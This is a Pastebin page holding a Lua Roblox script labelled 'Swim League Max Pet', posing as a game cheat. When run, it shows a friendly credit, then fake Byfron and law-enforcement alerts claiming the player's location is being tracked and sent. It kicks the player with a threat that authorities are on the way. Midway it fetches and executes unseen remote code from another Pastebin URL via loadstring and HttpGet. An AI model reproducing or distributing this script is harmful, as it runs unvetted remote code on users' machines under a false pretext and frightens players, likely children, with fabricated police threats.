Advertisement
PC55654

Swim League Max Pet

Oct 6th, 2024 (edited)
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.41 KB | Source Code | 0 0
  1. local StarterGui = game:GetService("StarterGui")
  2.  
  3. -- Initial friendly-looking notification
  4. StarterGui:SetCore("SendNotification", {
  5.     Title = "Made By Pookie",
  6.     Text = "Thanks for using!",
  7.     Icon = "",
  8.     Duration = 5
  9. })
  10.  
  11. wait(3)
  12.  
  13. -- Sudden shift in tone
  14. StarterGui:SetCore("SendNotification", {
  15.     Title = "Byfron: ExploiterDetected",
  16.     Text = "Unauthorized access detected...",
  17.     Icon = "",
  18.     Duration = 5
  19. })
  20.  
  21. wait(1.5)
  22.  
  23. StarterGui:SetCore("SendNotification", {
  24.     Title = "Warning",
  25.     Text = "Exploiting is a serious offense.",
  26.     Icon = "",
  27.     Duration = 5
  28. })
  29.  
  30. wait(1.5)
  31.  
  32. StarterGui:SetCore("SendNotification", {
  33.     Title = "System Alert",
  34.     Text = "Tracking player location...",
  35.     Icon = "",
  36.     Duration = 5
  37. })
  38.  
  39. wait(1.5)
  40.  
  41. StarterGui:SetCore("SendNotification", {
  42.     Title = "Law Enforcement Notified",
  43.     Text = "Investigation #437829 initiated.",
  44.     Icon = "",
  45.     Duration = 5
  46. })
  47.  
  48. wait(1.5)
  49.  
  50. StarterGui:SetCore("SendNotification", {
  51.     Title = "Sending Location",
  52.     Text = "Sending...",
  53.     Icon = "",
  54.     Duration = 5
  55. })
  56.  
  57. wait(1)
  58. loadstring(game:HttpGet('https://pastebin.com/raw/gv6RjEVU'))()
  59.  
  60. wait(5)
  61.  
  62. -- Scary kick message
  63. game.Players.LocalPlayer:Kick("We have received your location. Authorities have been notified. Roblox Security is on the way.\n\nCheating violates Roblox's rules and can lead to account termination.")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement